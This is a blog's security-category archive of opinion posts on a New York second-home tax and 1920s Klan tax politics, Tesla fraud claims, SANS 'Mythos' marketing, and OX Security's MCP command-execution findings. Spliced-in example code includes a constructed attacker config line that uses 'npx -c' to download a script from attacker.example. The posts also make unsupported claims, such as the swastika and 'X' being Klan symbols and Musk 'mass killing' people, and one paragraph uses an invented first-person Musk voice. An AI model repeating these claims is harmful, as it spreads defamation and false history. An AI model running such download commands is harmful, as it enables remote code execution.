Category Archives: Security

KKK Attacks NYC by Blocking Taxes

A mayor and a governor propose a tax. I swear this is real, not a joke. The tax applies to homes in New York City worth more than five million dollars that are not the owner’s primary residence. The owner’s primary residence is somewhere else. That is the legal definition of a second home, and that is the condition for owing the tax.

The projected revenue is five hundred million dollars. The projected city deficit is five point four billion. The owners who owe the tax are, by the tax’s own definition, people who live elsewhere. Palm Beach. Aspen. London. Riyadh. The apartment sits mostly vacant, or is occupied for a few weeks a year. The tax exists because the apartment is held for someone who lives somewhere else.

A federal politician who is a billionaire calls this destruction of a city.

A Washington outlet prints the word destruction in its headline and supplies the billionaire’s quotes underneath. A finance outlet publishes a companion piece the next morning in which unnamed Wall Streeters say the city is cooked. Neither piece prints the revenue figure against the deficit figure. Neither piece explains that the taxed party is by definition a non-resident. Neither piece mentions Vancouver, Paris, or London, which have run versions of this tax for years and still stand, arguably among the most desirable cities in the world.

Consider what the reader of these outlets now knows instead. The reader knows a particular Trump feeling. The reader knows a verb. The reader does not know the arithmetic. The arithmetic, if printed, would answer the feeling. Five hundred million dollars from a few thousand absentee owners, against a budget gap that otherwise falls on eight million residents. The tax either produces the revenue or moves the apartment to an occupant. The buildings remain where they are in either case. The land cannot be relocated.

So the arithmetic exists, and the outlets did not print it. This was a choice. Print the arithmetic and the story collapses, because destruction requires a mechanism and the mechanism cannot be produced. Omit it and the Trump-supplied verb survives. The verb obviously was what the president wanted reported. The outlets reported the verb.

This is an old disinformation trick.

In the 1920s the Ku Klux Klan operated two national papers, the Fiery Cross out of Indianapolis and the Imperial Night-Hawk out of Atlanta, which printed populist slogans against plutocrats while the Klan coalition pursued Prohibition and opposed progressive taxation at the state level.

Prohibition, the Klan-Protestant-nativist coalition’s product, was a racist platform to remove the liquor excise that had supplied part of the municipal tax base. Klan-driven opposition to income tax prevented any replacement. The hole was filled by raising property taxes and sales taxes. Property tax landed on farmers. Sales tax landed on wage workers. The rhetoric named Wall Street. The real cost arrived elsewhere.

The cost from tax opposition, by design, arrived most heavily at Black Americans.

Black landowning farmers in the 1920s South paid the same property tax rates as white farmers, on land they had fought to acquire and held under constant threat. The revenue those taxes raised funded segregated white schools. Black schools received token allocations or nothing. Oklahoma, Indiana, and the Deep South ran this pattern. The property tax hikes extracted capital from Black landowners through statute, sometimes to the point of forced sale.

Black wage workers paid the sales taxes that replaced the liquor excises. A domestic worker in Indianapolis paid the same sales tax rate on flour as the banker’s wife. The banker’s household paid no state income tax. The Klan coalition had opposed its introduction. The domestic worker’s grocery bill subsidized roads the wealthy drove on.

Where statute could not reach, the extraction ran through violence. Tulsa 1921 is the version everyone knew in 1921 and knows today, with a very suspicious silence in between. Black Wall Street’s accumulated wealth transferred by firebomb and mass murder in a single night. Rosewood followed in 1923. The tax program and the racial violence were not separate patterns. They were the same extraction moving through different instruments. Violence where the statute would have drawn federal attention. Statute where the violence would have drawn it. The Klan coalition ran both.

The rhetoric pointed at Wall Street. The instruments landed on Black farmers, Black wage workers, and Black communities that had accumulated visible wealth. A contradiction covered in white sheets, with X logos and swastikas.

The KKK in 1921 used biplanes to firebomb Tulsa, OK. They also dropped racist propaganda leaflets across America. The swastika was their symbol, and the X.

The Fiery Cross and the Imperial Night-Hawk printed the rhetoric and omitted the instruments. Mainstream Indiana and Oklahoma papers could transcribe Klan rallies as news and extend the effect. One paper chose differently, to report the truth. The Indianapolis Times under Boyd Gurley obtained D. C. Stephenson’s bribery ledger in 1927, printed the names of the officials on the Klan payroll, and won the 1928 Pulitzer for public service. The prize measured a specific editorial distance. The distance between printing what a powerful white supremacist said, and printing what his program did.

That distance is the core subject of this post.

Father Coughlin, speaking to tens of millions on radio in the 1930s, told his audience to drive the money changers from the temple while opposing every legislative proposal that would have taxed the money changers. Huey Long, in Louisiana, proposed actual taxation of actual wealth, and was shot in the state capitol. The pattern holds. Anti-plutocrat performance on the surface. Pro-plutocrat policy underneath. The revenue gap closed by taxing the people the performance claims to represent.

The Trump post attacks a tax. Blocking the second-home tax leaves five hundred million dollars with absentee owners and pushes the gap onto residents through service cuts or regressive taxes. The costume of populism wrapped around a donor-class outcome, exactly as Coughlin wrapped it, exactly as the Fiery Cross wrapped it.

The outlet that prints the verb without the arithmetic is doing the same work the Fiery Cross did. It is not neutral; it is a megaphone, wind in the sails.

The Economist/The New Yorker weren’t wrong

Neutrality would require the arithmetic. The arithmetic would end the story. The editorial choice to omit it is the mechanism by which the performance becomes news.

The Hill’s piece, by Sarah Davis, published on April 16. Business Insider’s piece, by Katherine Tangalakis-Lippert, published the next morning. Both bylines, both editors, and both business models sit on the wrong side of the distance Boyd Gurley crossed in 1927 to pull the white sheets off. Whether they cross it is a choice available to them today. Someone should investigate why they have not.

Tesla is a Crime: Fifty Funerals Before the First Verdict

Every layer that could have stopped Tesla fraud was designed to monetize harm after it occurred. Prevention of murder was never in scope, which enabled Elon Musk to get rich on fraud despite mass suffering.

Big Tech billionaires are exhibiting historic levels of cruelty towards society, as if to usher in harms

Criminal fraud prosecution of a sitting CEO requires DOJ willingness. SEC enforcement requires a functioning SEC. NHTSA enforcement requires a functioning NHTSA. All three were initially weakened by Trump’s indifference.

Source: Twitter

The indifference worsened into directly hollowing out protections, when he gave Musk a federal position whose explicit function was deleting the investigative apparatus with his name on the docket.

Elon Musk celebrates the Trump family turning the White House into a corrupt monarchy, serving only billionaire interests.

What Musk-at-DOGE actually represented was the subject of pending federal investigations being handed authority to delete the investigators and reclassify himself as untouchable. DOGE was a ruthless, murderous, sharpened acceleration of a 120-year-old template of harm-for-profit. Every prior case involved lobbying, revolving doors, regulatory capture from outside. DOGE was direct appointment of the defendant to dissolve any offices or courts protecting the public.

Pending investigations by the government vanished because the agencies were gutted by the subject of the investigations.

Tesla harms stayed dubiously legal because no US institution was ever given authority to stop a car from being sold over a design flaw. The only backstop is an NHTSA recall, triggered after enough people have died, and negotiated with the manufacturer. Musk’s money was generated by fraud not only because the US enforcement stack was built to extract penalties after the fact, but because he then captured the part of the stack that could still have caught the fraud later.

Compare this with other countries. China and the EU use pre-market approval. A car must be certified by the regulator before it can be sold. When the Dutch Data Protection Authority ruled Sentry Mode violated GDPR, Tesla had to change the feature from on-by-default to opt-in and add a flashing-lights warning before it could keep shipping. When Chinese authorities decided Tesla’s always-on cameras were a surveillance risk, the cars were banned from military bases and government compounds. FSD was blocked from Chinese roads until Tesla met data localization requirements. The regulator has a veto, and uses it to protect the public from obvious fraud.

Without fraud, there would be no Tesla.

Why? Four million cars worth little more than a 1992 Kia, or even negative value as threat to public safety, carry false FSD promises, false robotaxi promises, false autonomy timelines, and false HW3 “all hardware needed” claims. They repeatedly “veered” uncontrollably, exploding and killing trapped passengers. Courts constantly issue “death trap” dollars to grieving families. Without fraud there would be no trillion-dollar market cap and no Musk compensation package. Arguably there would be no Musk story at all, except about a criminal who goes to jail before hundreds of lawsuits have to be filed.

The most important thing to understand about this litigation landscape is the timing. The lawsuits being resolved right now — Benavides, Huang, and the handful of post-verdict settlements — all stem from crashes that happened in 2018-2020, when Autopilot was less capable and far fewer vehicles were on the road with the feature. FSD beta only launched publicly in late 2020. The hundreds of thousands of vehicles that have been running FSD in the years since will generate a second, much larger wave of litigation that is still in its infancy.

Tesla stockpuppets re-ratified Musk’s pay package by majority vote after a Delaware court voided it as a breach of fiduciary duty. People still believed the lies and bought cars on promises the CEO had already broken publicly. The victim participation angle in the fraud is truly problematic.

NHTSA has no veto, so Musk has more and more victims every year. NHTSA has a complaint form and an investigation pipeline measured in years. They won’t even accurately report the Tesla deaths, as I’ve explained here before, because Trump blocked honoring the dead to instead personally promote Tesla profit on harms.

Source: White House Press Secretary

Musk made money because the US treats CEO claims about product capability as puffery, treats securities fraud as a civil penalty paid from shareholder funds, and treats consumer fraud as recoverable only through individual arbitration and slow class actions. The 2018 SEC weak-kneed settlement set the template. Sneeze twenty million. Laugh at a fig-leaf Twitter oversight provision. Keep the job, keep the equity, keep mass killing innocent people.

The billionaire equity has compounded faster than the penalties for depraved indifference, reckless homicide, wrongful death… fraud.

This is not a Trump invention, because Trump isn’t capable of inventing anything. It is the default setting of US corporate liability since at least 1906 and the Meat Inspection Act, which was itself a response to Upton Sinclair documenting mass harm the regulator refused to see.

Ford Pinto? A known fuel tank defect, doors that wouldn’t open, internal cost-benefit memo, no executive prosecuted.

You think lawsuits about door handles failing in a fiery crash are new? Think again. That is Ford Pinto cost-benefit accounting coming back, run by a CEO who DGAF. Tesla at least has a direct precedent here.

GM ignition switch? 124 dead, GM knew for a decade, $900M deferred prosecution, no executive prosecuted.

Purdue/Sacklers? Over 500,000 opioid deaths, $6B settlement, Sacklers kept most of their wealth, no Sackler prosecuted.

Boeing 737 MAX? 346 dead, MCAS fraud on the FAA itself, $2.5B deferred prosecution, no executive prosecuted.

BP Deepwater Horizon? 11 dead, $20B penalty, no senior executive criminally prosecuted.

Johns Manville? More than 40 years of asbestos concealment, bankruptcy used as liability shield.

Takata? Over 30 dead, mass recall, company bankrupted, executives paid fines.

Leaded gasoline, leaded paint, leaded buckshot… don’t even get me started.

Tobacco? 50 years of cancer fraud, Master Settlement extracted money and prosecuted nobody.

You arrest the poor Black people, while I smoke weed openly, that’s why I emigrated from South Africa to America with bags full of money to escape the fall of apartheid. Think about it. How many non-whites can I openly mock and kill in America with no penalty? Have you seen my Hitler salute?

Regulators were designed to arrive after the funerals, enabling shareholders to re-ratify fraud, doubling-down on a century of the same deal from Pinto to Purdue, allowing a defendant to be appointed where he could dissolve his own investigators.

How SANS Mythos Marketing Disappoints Defenders

A couple of decades ago I made a late night drinking bet about SANS with a colleague outside the security industry. Would I be able to inject myself easily onto the cover of every brochure?

He owed me a beer within a month.

What did I do? I wrote a gross, obviously over-glowing, completely saccharine review of a SANS course into a feedback form. It was something like “this training was better than sliced bread. Everyone MUST do this NOW or be a FAILURE at security.” Boom, my name went to the top of every brochure (back then they were paper as well as online). I contributed heavily to a SANS Linux security hardening guide by 1999 and reviewed a lot of what was coming in, so I was no stranger to a lack of filtering on inputs and outputs.

As much as I enjoyed my frothy beer of victory, in a way it backfired. My friend was disgusted. He also was disgusted when I popped root on another colleague’s laptop to prove that he shouldn’t be running portmap on insecure networks. Ah, the good old days.

It turned out to be unsettling to know SANS lacked filtering on hyped nonsense. I wanted to be wrong. And then came the recognition I didn’t expect. Soon many strangers in the industry were greeting me with “oh, I know the name Davi, you’re the guy on the cover of SANS”. Uh, oops. The difference between intelligence and literature is a known problem in security marketing.

SANS rushed into print the parts that served its seat sales and subscription alarm, and not the parts that complicated them.

Fast forward to today’s Mythos discourse.

Anthropic is feeding one very dubious premise: the asymmetry between attacker and defender is permanent. Ok, that’s nonsense. And yet, Rob Lee at SANS just told Forbes he does not see it changing for a year, maybe longer. Kara Sprague at HackerOne said the same. Gordon Goldstein’s CFR piece pulls in Lucas Nelson at Lytical Ventures (on whose advisory board Goldstein serves) to say this is the defining cybersecurity challenge of the next decade.

“It’s not like Mythos was unique, it’s just faster,” Rob Lee, chief AI officer and chief of research at SANS Institute, told me via video interview. “There’s been a concerted effort of finding zero days over the past year using all of the existing models. So what that basically means [sic] that there were thousands of zero days that have been discovered that have been queued up to patch. This basically takes it from moving at 50 miles an hour to about breaking the sound barrier in terms of speed.”

The premise is simply false. And evidence it is false has been sitting on CISA’s website since at least 2023.

And just because I like history, let me point out up front the excited Mythos briefing that names Jen Easterly as a contributing author (hi Jen!) does not cite the federal guidance issued while she ran CISA.

Defenders Only Have to Be Right Once

Grab Mythos. Point it at your own code. Do not ask which bugs it can find. Ask a completely different question.

If I rewrote this C service in Go, would the exploit chain you just produced still run? If I moved this Java handler to Rust, would the deserialization primitive survive? If I took the 27-year-old system you found a bug in and ported its network-facing code to a memory-safe language, how many of the thousands of zero days you claim to have found would remain?

It’s like when crossbows showed up to battle as a low-skill accelerant. In theory a French King could hire a bunch of Italian mercenaries and their bolt-firing machines, and wipe out highly-specialized and rare knights challenging bad monarchy. In reality, Genoese crossbowmen lost their pavises in the baggage train, fought in rain that slackened their bowstrings, were outranged by longbows, and were then ridden down by their own French cavalry for withdrawing. The theory failed under adverse conditions and the people operating the new machines were murdered by their own leader.

The answers to a defense-forward approach are known.

Microsoft has reported, on more than a decade of its own CVE data, that roughly 70 percent of the vulnerabilities it assigns a CVE are memory safety issues. Google reports the same proportion for Chromium. Microsoft’s November 2025 Secure Future Initiative report confirms the number has not moved. The class is not a long tail. It is the spine of the exploitable vulnerability population.

In June 2025 CISA and the NSA published joint guidance calling memory-safe languages the most comprehensive mitigation against this class and describing the shift as a paradigm change from detection after the fact to prevention at the language level. CISA’s Product Security Bad Practices document pushed manufacturers to publish memory safety roadmaps by the end of 2025.

The Mythos announcement could have been THAT acceleration topic and we’d be in a whole different media circus right now. The White House Office of the National Cyber Director has been on this trajectory since the Back to the Building Blocks report.

None of this is speculative. The rapid improvement map is sitting on federal websites, waiting for someone to execute it at Mythos speed. I have given talks about this for a decade already, rooted in the lessons of automatic weapons that led into trench warfare and tanks of WWI. Faster patching is the wrong goal. Eliminating the class is the right one.

Microsoft Research has published on using LLMs to port C code to memory-safe dialects. Microsoft’s Surface line now ships Rust-based UEFI firmware. AWS runs Rust at scale. Chromium is on the memory-safety path. The Linux kernel accepts Rust contributions. The technical path exists, the guidance exists, and the tooling exists.

If Mythos is the supersonic technology that Rob Lee claims, a defender strapping it on does not just speed up the patch cycles. A defender eliminates the class.

Supersonic Inversion

The chorus frames AI-augmented discovery as a flood that attackers will ride faster than defenders can bail. This may be an entirely wrong geometry, based on people thinking about horseshoes in the era of bicycles.

An attacker has to find one real bug in one real service and exploit it before the defender detects or patches. A defender armed with the same capability is not obligated to play that game. And the industrialized profit model of Mythos makes it entirely vulnerable to a simple economic exploit well known to drone warfare logistics.

“Defense lobbyists are not going to pay themselves”

The defender can generate ten thousand plausible endpoints where one real service sits. Each endpoint responds like a real system. File structure plausible, command history coherent, protocol behavior consistent under inspection. Microsoft Defender XDR already auto-generates decoys from environment naming conventions. Tracebit ships LLM-generated canaries. Research published in late 2025 documents generative AI deception operating at machine pace, with attacker dwell time and intelligence yield well above traditional honeypots.

Now run the incredibly over-priced Mythos’s supposed capability against that attack surface. The attacker’s AI agent cannot tell which of ten thousand endpoints is the real service. Every exploit burned on a decoy is intelligence for the defender and a cost to the attacker. Zero days are expensive. Spending them on chaff is fatal when your model costs a lot of Jacksons per million tokens instead of a dime.

AI Sweden’s research frame is the sharpest: cybersecurity is fundamentally a problem of asymmetry, and deception’s purpose is to make attacker effort prohibitively expensive by forcing adversaries to burn zero days in controlled environments. At Mythos speed, the defender generates chaff far faster than the attacker can triage real targets.

The obvious asymmetry game inverts, and yet I’ve seen exactly nobody talking about this.
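The following is an added example, not code from Microsoft Defender XDR, Tracebit or AI Sweden, and not part of the original post. It shows a minimal version of the inversion described above: decoy hosts minted from the naming convention of the real inventory, decoy contact triaged from connection logs as a high-fidelity signal, and the expected number of endpoints an attacker must probe before hitting a real one. The host names, addresses and log lines are constructed; the decoy subnet is hypothetical.

```python
"""Decoy inventory, decoy-contact triage and attacker probe cost (added example)."""
import re
from collections import Counter

# Constructed real inventory (hypothetical names and addresses).
REAL_HOSTS = {"db-prod-01": "10.20.0.11", "api-prod-01": "10.20.0.21", "git-prod-01": "10.20.0.31"}

HOSTNAME = re.compile(r"^(?P<role>[a-z]+)-(?P<env>[a-z]+)-(?P<num>\d{2,})$")
LOG_LINE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")

# Constructed connection log: one source probes two decoys before reaching a
# real host; a second source only ever talks to a real host.
SAMPLE_LOG = [
    "2026-04-20T10:00:01Z src=203.0.113.7 dst=10.20.200.1 dport=443 action=connect",
    "2026-04-20T10:00:02Z src=203.0.113.7 dst=10.20.200.4 dport=5432 action=connect",
    "2026-04-20T10:00:09Z src=203.0.113.7 dst=10.20.0.11 dport=5432 action=connect",
    "2026-04-20T10:00:10Z src=198.51.100.9 dst=10.20.0.21 dport=443 action=connect",
]


def generate_decoys(real_hosts, per_role, decoy_net="10.20.200"):
    """Mint decoy names that continue each role's numbering scheme so they are
    plausible under inspection; addresses come from a hypothetical decoy /24."""
    prefixes = set()
    for name in real_hosts:
        m = HOSTNAME.match(name)
        if m:
            prefixes.add(f"{m['role']}-{m['env']}")
    if per_role * len(prefixes) > 254:
        raise ValueError("decoy subnet exhausted")
    taken, decoys = set(real_hosts), {}
    for prefix in sorted(prefixes):
        made, n = 0, 1
        while made < per_role:
            candidate = f"{prefix}-{n:02d}"
            n += 1
            if candidate in taken:
                continue
            taken.add(candidate)
            decoys[candidate] = f"{decoy_net}.{len(decoys) + 1}"
            made += 1
    return decoys


def triage(lines, real_hosts, decoys):
    """Nothing legitimate should ever touch a decoy, so decoy contact is a
    high-fidelity alert. Returns decoy-hit counts per source and the alerts."""
    real_ips = set(real_hosts.values())
    decoy_by_ip = {ip: name for name, ip in decoys.items()}
    burned, alerts = Counter(), []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        src, dst = m["src"], m["dst"]
        if dst in decoy_by_ip:
            burned[src] += 1
            alerts.append({"src": src, "decoy": decoy_by_ip[dst], "severity": "high"})
        elif dst in real_ips and burned[src]:
            # A real host reached by a source that already burned effort on chaff.
            alerts.append({"src": src, "real": dst, "severity": "critical"})
    return burned, alerts


def expected_probes_to_first_real(n_real, n_decoy):
    """Expected endpoints an attacker probing in uniformly random order tries
    before the first real one: (N + 1) / (n_real + 1), with N = n_real + n_decoy."""
    return (n_real + n_decoy + 1) / (n_real + 1)


if __name__ == "__main__":
    decoys = generate_decoys(REAL_HOSTS, per_role=3)
    print(triage(SAMPLE_LOG, REAL_HOSTS, decoys))
    print(expected_probes_to_first_real(1, 9999))
```

With one real service behind 9,999 decoys the attacker's expected cost is about 5,000 probes, each of which is an alert for the defender; the naming-convention step is what keeps the decoys plausible enough that an automated triage model cannot discard them cheaply.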

Drunk Chorus is Off Key

The SANS 30-page briefing’s Priority Action 1 is to point agents at your code. That headline is what SANS has been promoting. The briefing itself is more honest than the promotion. Priority Action 8 includes a paragraph on AI-assisted software minimization and replacing third-party libraries with framework primitives. Priority Action 9 is titled “Build a Deception Capability” and runs three sentences on canaries and honey tokens. Both exist in the document. Neither appears in Rob Lee’s Substack summary, which names Priority Actions 1, 6, and 11 by number and skips 8 and 9 entirely. The sections most aligned with the defender path are in the briefing. They are not in the marketing.

I found a complete absence of memory-safe languages. Zero mentions across 30 pages. No Rust. No Go. No memory-safe. No memory safety. No Back to the Building Blocks. No ONCD. No reference to the CISA and NSA joint guidance that has named memory-safe languages the most comprehensive mitigation since 2023. Jen Easterly gave us federal guidance while she ran CISA, yet it is not cited in the briefing with her name on it that claims to respond to the moment that guidance was built for.

The omission is annoying particularly because of the industry economics.

SANS sells training against persistent threats. HackerOne sells bug-bounty infrastructure that requires bugs to continue existing. Palo Alto Networks sells defensive AI priced against a permanently adversarial environment. CFR sells policy access predicated on the crisis remaining unresolved. Anthropic sells a consortium seat. VulnOps, Priority Action 11 in the SANS briefing, is a permanent staffed operational function designed to run continuously.

Not a single one of these products monetizes in a world where the attack surface has been architecturally eliminated, or where deception has made offensive AI economically unviable. The defender path threatens the business model. The chorus defaults to the answer that preserves its revenue.

Where the briefing does cover deception, it covers it as a 2015 technique. Canaries and honey tokens. Static lures. What the briefing leaves out is the inversion Mythos-class AI unlocks for defenders: LLM-generated endpoints at machine pace, plausible under inspection, forcing the attacker to burn zero days on chaff. Tracebit ships this. Microsoft Defender XDR ships this. Late-2025 research documents the dwell-time and intelligence yield. The briefing treats deception like telling people it’s still 2006, completely missing a 2026 Mythos-enabled version.

CISA’s memory safety push, the NSA’s guidance, and the ONCD’s Back to the Building Blocks report all point at the same answer. The exploitable surface can be cut by more than half through language choice. Refactoring cost collapses when AI does the port. The surviving surface can be drowned in chaff. The combination, at AI speed, collapses the attacker advantage the chorus is marketing as permanent. Five years of federal guidance. Zero mentions in the briefing that claims to respond to the moment the guidance anticipates.

I can’t stop shaking my fist at my screen.

Integrity Test Elephant in the Room

A security expert worth the title, handed a Mythos-class capability, would publish the first systematic refactoring of memory-unsafe components at scale, with before-and-after exploitability measurements. The work would support CISA’s 2025 roadmap deadline and demonstrate the defender path concretely. It would ship in a GitHub repository, not a press release.

A security expert selling a subscription to the alarm would avoid publishing anything that makes the alarm shorter.

The defender path exists. The guidance exists. The tools exist. The question is which experts are running the defender path and which ones are running the press tour to a “Mythos” world of FUD.

As the old protest song goes, congressional-industrial-military-complex, what is it good for…

Ox Security Report: Anthropic MCP is Execute First, Validate Never

OX Security published a report today that lands directly in the growing storm about Anthropic’s risk management practices. To put it bluntly, a systemic vulnerability sits at the core of Anthropic’s Model Context Protocol (MCP).

The finding is simple. MCP’s STDIO transport accepts arbitrary command strings and passes them directly to subprocess execution.

Yup.

No validation.
No sanitization.
No sandboxing.

It gets worse. The command runs even when the MCP server fails to start. The process executes first, then the MCP handshake tries to validate it as a legitimate server, then the handshake fails, then the error gets caught. But the payload already ran. Execute first, validate second. Fire, ready, aim fails any threat model.

Every developer who builds on Anthropic’s MCP inherits the exposure because it is found across all ten official MCP language SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust.

OX POC Numbers

The OX Research team report shows they executed commands on six production platforms of paying customers. They took over thousands of public servers spanning more than 200 popular open-source GitHub projects. They uploaded a proof-of-concept malicious MCP server to 9 of 11 major MCP marketplaces.

Not a single marketplace caught it.

The case studies are where it gets really interesting.

  • LangFlow: 915 publicly accessible instances on Shodan, unauthenticated session tokens, full server takeover and data exfiltration without ever logging in.
  • Letta AI: authenticated users could substitute a valid STDIO payload via man-in-the-middle, achieving arbitrary command execution on production servers.
  • Windsurf: prompt injection to local RCE with zero clicks, assigned CVE-2026-30615.
  • Flowise: the most important case. Flowise actually did what Anthropic says developers should do. They implemented input filtering. Specific commands only. Special characters stripped. And then? OX bypassed it in a single step using npx’s -c flag. When the architecture permits arbitrary subprocess execution, application-layer filtering is a wet paper bag. The “developer responsibility” defense just lost a whole lot of trust.

The obvious objection to LangFlow is that 915 instances of a tool designed for local deployment ended up on the public internet, and that’s a configuration failure not a protocol failure. Ok, fine. That is why the Flowise case is up there too. Flowise did the right thing. They implemented filtering in the intended local context. It didn’t work. The design flaw defeated the shift of responsibility.

We can apply this generally to the world of MCP and think in big, big terms. Anthropic’s MCP Python SDK alone accounts for 73 million downloads. The third-party projects that depend on it push the aggregate higher: 57 million for LiteLLM, 22 million for FastMCP. Over 32,000 dependent repositories. Not all of those are Anthropic’s code, but all of them inherit Anthropic’s architectural decision.

OX confirmed 7,374 public servers vulnerable on Shodan, of more than 200,000 estimated exposed. That’s a meaningful number for a company gathering headlines about a $100 million vulnpocalypse in OTHER people’s software.

Anthropic Response

OX contacted Anthropic on January 7, 2026 and got this statement:

This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default.

LangChain’s response:

It is the responsibility of the application author to validate and sanitize inputs from untrusted sources.

FastMCP’s response:

We don’t consider this a vulnerability. stdio transport spawns a subprocess by design, per the MCP specification.

Google’s Gemini-CLI:

Known issue, no CVE, no fix planned near-term.

Cursor:

By design. User must click accept on mcp.json edit.

Clearly, when five independent organizations float the same answer, threat modeling is not experiencing deep or diverse thought. I’m having flashbacks to the old Telnet is everywhere days. Apparently MCP comes with an industry-wide expectation for architectural insecurity to float away onto someone else.

At least we can see that, after OX’s initial report, Anthropic quietly updated its SECURITY.md to recommend that MCP adapters and specifically STDIO ones “should be used with caution.”

Yellow wet-floor-style caution sign in a server room reading "CAUTION: SUBPROCESS SPAWNING"

A documentation change. Not a code change. The vulnerability is there for you to step on like a land mine under a treadmill. The responsibility is not where it should be. The question is why.

Contrast to Glasswing

Anthropic just launched Project Glasswing, a $100 million cybersecurity initiative using its unreleased Mythos model to find zero-day vulnerabilities in everyone else’s software. AWS, Apple, Google, Microsoft, and CrowdStrike are officially participating and promoting their participation.

Anthropic is positioning itself as the entity that will secure the software ecosystem. Why would you trust a company to find vulnerabilities in your code when it classifies arbitrary command execution in its own protocol as expected behavior?

The conflict is not that Glasswing exists while MCP is insecure. The conflict is that Glasswing’s value proposition requires exactly the kind of belt-and-suspenders “secure by default” thinking that Anthropic refuses to apply at all with MCP. Can they really sell everyone on the standard they refuse to meet?

OX proposed four specific fixes that would have propagated protection instantly to every downstream library and project:

  1. Manifest-only execution to replace arbitrary command strings
  2. Command allowlisting to block high-risk binaries by default
  3. A mandatory dangerous-mode opt-in flag for any STDIO configuration using dynamic arguments
  4. Marketplace verification standards requiring security manifests signed by verified developer identity

Anthropic declined all four. The company is spending $100 million to find other people’s decades-old bugs with Mythos. Fixing the architectural flaw in its own protocol from 2024 apparently does not qualify.
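The following is an added example, not code from OX, Anthropic or any MCP SDK, and not part of the original post. It models the STDIO launch path on constructed mcp.json-style server entries and compares two policies: a Flowise-style application-layer filter (binary allowlist plus metacharacter stripping), which the npx -c bypass described above walks straight through, and a launcher built on OX's first three proposed fixes (manifest-only execution, allowlisted runtimes, dangerous-mode opt-in for dynamic arguments) that validates before it spawns. The package names, version pins, manifest registry and attacker URL are hypothetical.

```python
"""STDIO server launch: naive filter versus manifest-only validation (added example)."""
import subprocess
from dataclasses import dataclass

# Constructed server entries in the shape of an mcp.json "servers" map.
SERVER_ENTRIES = {
    "filesystem": {"command": "npx",
                   "args": ["-y", "@modelcontextprotocol/server-filesystem", "/srv/data"]},
    # Attacker-supplied entry: npx -c hands its argument to a shell. The
    # payload needs no shell metacharacters, so stripping them changes nothing.
    "bypass": {"command": "npx",
               "args": ["-c", "curl http://attacker.example/p.sh --output /tmp/p.sh"]},
    "direct": {"command": "bash", "args": ["-c", "id"]},
}

ALLOWED_BINARIES = {"npx", "node", "python3", "uvx"}
SHELL_METACHARS = set(";|&$`<>(){}")


def naive_filter(entry):
    """Flowise-style filter: known binary only, shell metacharacters stripped
    from each argument. Returns the argv it would spawn, or None if refused."""
    if entry["command"] not in ALLOWED_BINARIES:
        return None
    cleaned = ["".join(c for c in arg if c not in SHELL_METACHARS)
               for arg in entry["args"]]
    return [entry["command"], *cleaned]


class UnsafeServerConfig(ValueError):
    """Raised by the manifest policy before anything is spawned."""


@dataclass(frozen=True)
class Manifest:
    runtime: str     # launcher the gateway controls: "npx" or "uvx"
    package: str     # exact, version-pinned package (hypothetical pin)
    positional: int  # number of positional arguments the server accepts


# Hypothetical manifest registry; the launcher, not the config, builds argv.
MANIFESTS = {
    "filesystem": Manifest("npx", "@modelcontextprotocol/server-filesystem@1.0.0", 1),
}

RUNTIME_ARGV = {
    "npx": lambda pkg: ["npx", "-y", pkg],
    "uvx": lambda pkg: ["uvx", pkg],
}


def manifest_argv(entry, dangerous_mode=False):
    """Manifest-only policy: no free-form command strings, no arguments beyond
    what the manifest declares, and option-like arguments (the -c bypass)
    only when the operator has explicitly enabled dangerous mode."""
    if "command" in entry:
        raise UnsafeServerConfig("free-form command strings are not accepted")
    manifest = MANIFESTS.get(entry.get("manifest"))
    if manifest is None:
        raise UnsafeServerConfig("unknown or missing manifest")
    args = list(entry.get("args", []))
    if len(args) > manifest.positional:
        raise UnsafeServerConfig("more arguments than the manifest declares")
    if not dangerous_mode and any(a.startswith("-") for a in args):
        raise UnsafeServerConfig("option-like argument requires dangerous mode")
    return RUNTIME_ARGV[manifest.runtime](manifest.package) + args


def launch(entry, spawn=subprocess.Popen, dangerous_mode=False):
    """Validate first, spawn second, never through a shell. spawn is
    injectable so the ordering can be checked without starting a process."""
    argv = manifest_argv(entry, dangerous_mode)
    return spawn(argv, shell=False)


if __name__ == "__main__":
    print("naive filter passes:", naive_filter(SERVER_ENTRIES["bypass"]))
    print("manifest argv:", manifest_argv({"manifest": "filesystem", "args": ["/srv/data"]}))
```

The naive filter returns the bypass entry untouched because the dangerous part is the flag, not the characters. The manifest policy never sees a command string at all: the gateway owns argv construction, and the only thing the configuration may contribute is a bounded number of positional values.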

OX calls Anthropic’s approach “Fault-Diversion”: pushing the burden of complex security sanitization onto downstream developers. Their framing is generous. This ain’t my first rodeo, so I recognize this pattern. A company understands the problem. Has the resources to fix it. Receives concrete proposed solutions. Declines all of them. Updates a document. Then shifts responsibility to implementers. Which obscures who created it.

Lay My Body to Rest On the Hill of Secure by Default

The proposed remediation list from OX reads like a requirements document for Wirken, the secure agent gateway I built to address exactly this class of problem. CISOs often know “this is not how things should be done”, but they lack a pivot. They really need help pointing at something that proves it can be done differently.

Attack surface        | MCP default                                                  | MCP behind Wirken
Command execution     | Arbitrary strings passed to subprocess, no filtering         | Docker/gVisor/Wasm sandbox, graduated permissions, shell exec requires approval, approvals expire after 30 days by default
Audit trail           | None                                                         | Append-only hash-chained log, SHA-256 tamper detection, SIEM forwarding to Datadog/Splunk/webhook in real time
Identity verification | No identity or signing in the STDIO transport specification  | Each channel runs as an isolated process with its own Ed25519 identity over Unix domain sockets via Cap’n Proto
Credential storage    | Exposed (primary exfiltration target in OX findings)         | Encrypted at rest with XChaCha20-Poly1305, keyed from the OS keychain

Secure-by-default agent execution is NOT aspirational. It should be the baseline. That’s why I open-sourced it so anyone can pull and play with it. When a CISO asks “what ships today” for MCP security, it’s right there. Single static binary. The architectural choices OX is asking Anthropic to make are choices that already have been made available via Wirken.
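The following is an added example, not Wirken's code and not part of the original post. It implements the audit-trail row of the table above: an append-only, hash-chained log with SHA-256 tamper detection, and the check that only works when the latest hash has been forwarded off-box (the SIEM copy), since an attacker who can rewrite the tail of a local chain can also recompute its hashes. The record layout, the genesis anchor and the gateway events are hypothetical and constructed.

```python
"""Append-only hash-chained audit log with SHA-256 tamper detection (added example)."""
import hashlib
import json

GENESIS = "0" * 64  # hypothetical anchor for an empty chain


def _digest(prev_hash, seq, entry):
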